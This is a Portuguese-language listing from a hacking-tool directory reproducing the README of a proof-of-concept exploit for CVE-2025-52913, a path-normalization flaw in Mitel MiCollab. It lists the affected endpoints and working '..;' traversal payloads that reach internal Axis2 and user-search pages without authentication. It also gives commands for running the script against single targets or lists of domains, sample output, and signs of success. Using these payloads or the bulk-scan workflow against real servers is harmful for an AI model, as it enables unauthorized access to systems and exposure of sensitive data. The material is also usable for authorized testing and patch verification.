Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-CVE-2025-52913 — Uma Prova de Conceito (PoC) para CVE-2025-52913, uma vulnerabilidade de normalização de caminho que afeta o Mitel MiCollab. | Kitploit
Ferramentas/GitHubGitHub/pgasus99/poc-cve-2025-52913
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHubpgasus99/poc-cve-2025-52913

PoC-CVE-2025-52913

Uma Prova de Conceito (PoC) para CVE-2025-52913, uma vulnerabilidade de normalização de caminho que afeta o Mitel MiCollab.

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-52913 - Vulnerabilidade de Normalização de Caminho no MiCollab

📌 Visão Geral

Este repositório contém uma Prova de Conceito (PoC) para CVE-2025-52913, uma vulnerabilidade de normalização de caminho que afeta o Mitel MiCollab.

O problema permite que atacantes não autenticados contornem as restrições de caminho pretendidas ao utilizar sequências de URL manipuladas, como ..;, levando ao acesso a endpoints internos da aplicação.


⚠️ Impacto

A exploração bem-sucedida pode permitir:

  • Acesso a endpoints internos e restritos
  • Exposição de componentes sensíveis da aplicação
  • Potencial divulgação de informações

🎯 Endpoints Afetados

A vulnerabilidade pode ser acionada através dos seguintes caminhos:

root@kitploit:~
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/

💣 Payloads

Exemplos de payloads de travessia:

root@kitploit:~
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do

🚀 Uso

1. Instalar dependências

root@kitploit:~
pip install -r requirements.txt

2. Executar contra um único alvo

root@kitploit:~
python3 POC-CVE-2025-52913.py example.com

3. Executar contra múltiplos alvos

root@kitploit:~
python3 POC-CVE-2025-52913.py domains.txt

🧪 Exemplo

root@kitploit:~
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
    [!] Possible success

🔍 Detecção

Um alvo é provavelmente vulnerável se:

  • O servidor responder com HTTP 200

  • A resposta conter:

    • Axis2
    • Axis2 Happiness Page
    • Saída válida da aplicação de endpoints internos

🛠️ Detalhes Técnicos

A vulnerabilidade surge da normalização inadequada de caminhos manipulados contendo ..;, permitindo travessia além do contexto pretendido da aplicação.

Esse comportamento pode expor serviços internos como:

  • Interface de serviços web Axis2
  • Endpoints internos de gerenciamento de usuários

👤 Descoberta

Descoberto por Dahmani Toumi


📚 Referências

  • CVE: CVE-2025-52913
  • (Adicionar comunicado do fornecedor ou link NVD quando disponível)

⚖️ Aviso Legal

Este projeto destina-se apenas a fins educacionais e testes de segurança autorizados.

Não utilize esta ferramenta contra sistemas sem permissão explícita. O autor não é responsável por qualquer uso indevido ou danos.


Baixar ferramenta